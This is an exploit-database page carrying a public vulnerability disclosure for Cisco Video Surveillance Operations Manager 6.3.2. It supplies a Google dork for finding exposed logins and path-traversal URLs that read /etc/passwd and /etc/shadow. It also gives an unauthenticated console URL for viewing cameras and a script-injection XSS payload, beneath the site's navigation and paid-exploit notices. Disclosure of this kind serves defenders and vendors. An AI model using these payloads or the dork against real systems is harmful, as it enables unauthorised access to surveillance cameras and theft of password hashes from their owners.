0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco Video Surveillance Operations Manager 6.3.2 XSS / LFI / Bypass
[# Exploit Title:Cisco Video Surveillance Operations Manager Multiple
vulnerabilities
# Google Dork: intitle:"Video Surveillance Operations Manager > Login"
# Date: 22 Feb 2013 reported to the vendor
# Exploit Author: Bassem | bassem.co
# Vendor Homepage: www.cisco.com
# Version: Version 6.3.2
# Tested on: Version 6.3.2
#1- The application is vulnerable to Local file inclusion
read_log.jsp and read_log.dep not validate the name and location of the
log file , un authenticated remote attacker can perform this
---------------------------------------------
read_log.jsp:
/usr/BWhttpd/root/htdocs/BWT/utils/logs
from /usr/BWhttpd/logs/<%= logName %>
---------------------------------------------
---------------------------------------------
read_log.dep
<%!
protected LinkedList getBwhttpdLog( String logName, String
theOrder ) {
String logPath = "/usr/BWhttpd/logs/";
String theLog = logPath + logName;
LinkedList resultList = new LinkedList();
try {
BufferedReader in = new
BufferedReader(new FileReader(theLog));
String theLine = "";
while( (theLine =
in.readLine()) != null ) {
if(
theOrder.indexOf("descending") > -1 ) {
resultList.addFirst(theLine);
} else {
resultList.addLast(theLine);
}
}
-----------------------------------------------
POC:
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow
#####################################################################
#2- The application is vulnerable to local file inclusion
select and display log not validate the log file names , If attacker
pass /etc/passwd through the http post request system will display it
as log file
POC:
http://serverip/monitor/logselect.php
#####################################################################
#3 Cisco Video Surveillance Operations Manager Version 6.3.2 doesn't
perform the proper authentication for the management and view console,
Remote attacker can gain access to the system and view the attached
cameras without authentication
POC:
http://serverip/broadware.jsp
#####################################################################
#4 Application is vulnerable to XSS
The web application doesn't perform validation for the inputs/outputs
for many of its pages so its vulnerable to XSS attacks
POC:
http://serverip/vsom/index.php/"/title><script>alert("ciscoxss");</script>
# 0day.today [2024-07-04] #